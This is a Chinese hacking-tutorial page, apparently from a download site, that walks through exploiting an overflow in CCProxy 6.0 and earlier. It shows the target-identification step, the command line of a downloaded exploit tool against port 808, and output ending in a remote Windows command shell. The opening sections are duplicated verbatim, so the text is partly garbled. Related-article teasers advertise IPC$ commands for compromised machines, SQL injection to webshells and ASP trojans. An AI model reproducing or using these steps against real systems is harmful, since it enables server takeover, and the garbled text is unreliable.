CCProxy代理软件中隐藏的阴谋分析

所属分类: 网络安全 / 黑客教程 阅读数: 186
收藏 0 赞 0 分享

  代理服务器为大家解决了很多问题,比如阻挡黑客攻击和局域网共享上网等。本文我们要讨论一个出在代理服务器上的漏洞,希望各位网管能够给予一定的关注。为了揭示这个隐藏的“阴谋”,让我们清楚知道自己的代理服务器是否存在这一漏洞,下面将模拟黑客对这个漏洞的攻击行为,以便大家采取相应的安全措施。

  一、代理软件漏洞

  CCProxy因其设置简单和使用方便等特点,成为国内最受欢迎的代理服务器软件。它不但支持常见的HTTP和SOCKS代理,而且还支持FTP和Telnet这类不常用的代理。它还可以控制用户代理上网的权限,设置访问代理服务器的用户名和密码,功能非常强大。

  这款优秀的代理软件最近爆出一个溢出漏洞,攻击者可以通过该漏洞直接获得代理服务器的控制权。该漏洞涉及的CCProxy版本为目前非常普及的6.0版,以及这之前的所有版本。

  软件资料

  软件名称:CCProxy

  软件版本:6.0

  授权方式:共享软件

  软件大小:820KB

  下载地址:

  二、探测CCProxy代理服务器

  要利用上述漏洞控制代理服务器,当然得先确定目标代理服务器是否安装的是CCProxy (图1)。

  

图1 CCProxy支持多种协议代理

  代理服务器为大家解决了很多问题,比如阻挡黑客攻击和局域网共享上网等。本文我们要讨论一个出在代理服务器上的漏洞,希望各位网管能够给予一定的关注。为了揭示这个隐藏的“阴谋”,让我们清楚知道自己的代理服务器是否存在这一漏洞,下面将模拟黑客对这个漏洞的攻击行为,以便大家采取相应的安全措施。

  一、代理软件漏洞

  CCProxy因其设置简单和使用方便等特点,成为国内最受欢迎的代理服务器软件。它不但支持常见的HTTP和SOCKS代理,而且还支持FTP和Telnet这类不常用的代理。它还可以控制用户代理上网的权限,设置访问代理服务器的用户名和密码,功能非常强大。

  这款优秀的代理软件最近爆出一个溢出漏洞,攻击者可以通过该漏洞直接获得代理服务器的控制权。该漏洞涉及的CCProxy版本为目前非常普及的6.0版,以及这之前的所有版本。

  软件资料

  软件名称:CCProxy

  软件版本:6.0

  授权方式:共享软件

  软件大小:820KB

  下载地址: https://www.jb51.net/softs/2199.html

  二、探测CCProxy代理服务器

  要利用上述漏洞控制代理服务器,当然得先确定目标代理服务器是否安装的是CCProxy (图1)。   

  图1 CCProxy支持多种协议代理
  三、攻击CCProxy代理服务器
  利用上述方法确认目标为安装了CCProxy的代理服务器,那么下面就开始利用CCProxy的溢出攻击工具进行溢出。从网上下载回来的CCProxy的溢出攻击工具叫“ccpx.exe”。在CMD命令行中打开它,可以看到帮助命令:
  Usage: ccproxyexp.exe [target_port]
  这其中“target_ip”是指目标主机的IP地址,“target_port”是CCProxy的主端口,默认情况下是“808”。
  根据参数输入攻击命令后提示:
  本主机IP是否与目标主机IP在同一个网段?[y/n]y
  [+] connecting to 127.0.0.1:808
  [+] send magic buffer...
  [+] connecting to CMD shell port...
  Microsoft Windows 2000 [Version 5.00.2195]
  (C) 版权所有 1985-2000 Microsoft Corp.
  C:\winnt\system32
  现在溢出成功,获得此代理服务器的控制权(图4)。
  
  图4 溢出成功拿到服务器控制权
更多精彩内容其他人还在看

爆破的一般思路与断点的设置

破 顾名思义就是暴力修改程序的代码来达到破解的目的 当然根据共享软件的注册方式我们可以对症下药 比如说没有注册的软件有功能限制、使用次数限制、使用日期限制等 我们就可以分别对待了!我们只需要解除这些限制自然就达到了破解的目的了! 暴力破解的一
收藏 0 赞 0 分享

解析RootKit与反RootKit(图)

Rootkit是一个或者多个用于隐藏、控制一台计算机的工具包,该技术被越来越多地应用于一些恶意软件中。在基于Windows的系统中Rootkit更多地用于隐藏程序或进程,系统被注入Rootkit后就可以在不为用户察觉的情况下进行某些操作。因此,其隐蔽性极高,危害也极大。下面笔
收藏 0 赞 0 分享

VC 下黑客软件隐蔽程序的手段

一、引言 随着计算机网络的不断发展,黑客技术也日益成为一支不可忽视的技术力量,尽管多数黑客的攻击目标以服务器为主,对大多数的互连网用户的直接危害并不大。但有一类称为"特洛伊木马"的黑客程序可以通过欺骗等手段在普通网络用户端安装木马的服务端,使
收藏 0 赞 0 分享

PERL铸造多线程 支持中文破解SQL自动注入猜解机

说到SQL注入机,从娃娃针对动网文章的dvTxt.pl到臭要饭的绝世猜解CSC、NB联盟的NBSI,大家也都用过吧? 开天始祖 dvTxt.pl,也不知被改了多少遍,以用于针对各种不同的有SQL注入漏洞的系统,通常《黑防》的一篇《**存在SQL注入漏洞》的文章,末了,都要把
收藏 0 赞 0 分享

总结所有得肉鸡后的命令

net use $">\ipipc$Content$nbsp;" " /user:" " 建立IPC空链接 net use $">\ipipc$Content$nbsp;"密码"
收藏 0 赞 0 分享

通过SQL注入得到WebShell的原理及步骤

一.通过SQL注入得到WEBSHELL的原理: N.E.V.E.R的方法:利用数据库备份得到WEBSHELL。创建一个表,在表中建一个字段用来保存木马数据。然后利用MSSQL导出库文件的办法把整个数据导出来,最后再删除新建的表。 分析: N.E.V.E.R利用
收藏 0 赞 0 分享

教你成为ASP木马高手

1.名称:如何制作图片ASP木马 (可显示图片) 建一个asp文件,内容为<!--#i nclude file="ating.jpg"--> 找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行h
收藏 0 赞 0 分享

教你注入下载文件的代码到IE进程然后下载的文件

大家可能都用过网页木马来下真正的EXE木马吧,但是有些时候 后门比较大下载的时候常常是网页暂停或是报错(CHM木马常遇到) 所以写了这个程序。。。。 程序还要改下才好用哈,不过只有2kb很小了。。。。 编绎参数: C:masm32BIN
收藏 0 赞 0 分享

Google 黑客搜索技巧

站内搜索地址为: httpwww.google.comcustomdomains=(这里写我们要搜索的站点,比如feelids.com) 进去可以选择www和feelids.com, 当然再选我们要的站内搜索哦! 黑客专用信息和资料搜索地址为:
收藏 0 赞 0 分享

零距离感受入侵服务器

很多网上安全教程都介绍了如何通过百度和GOOGLE来搜索漏洞代码而发动攻击,这种文章在实际应用中没有什么价值,毕竟很多时候我们需要定点定位攻击目标服务器而不是这种广撒网覆盖形式的入侵。只有学会针对某定点服务器进行扫描和攻击才有利于我们增长企业安全防范与攻击技
收藏 0 赞 0 分享
查看更多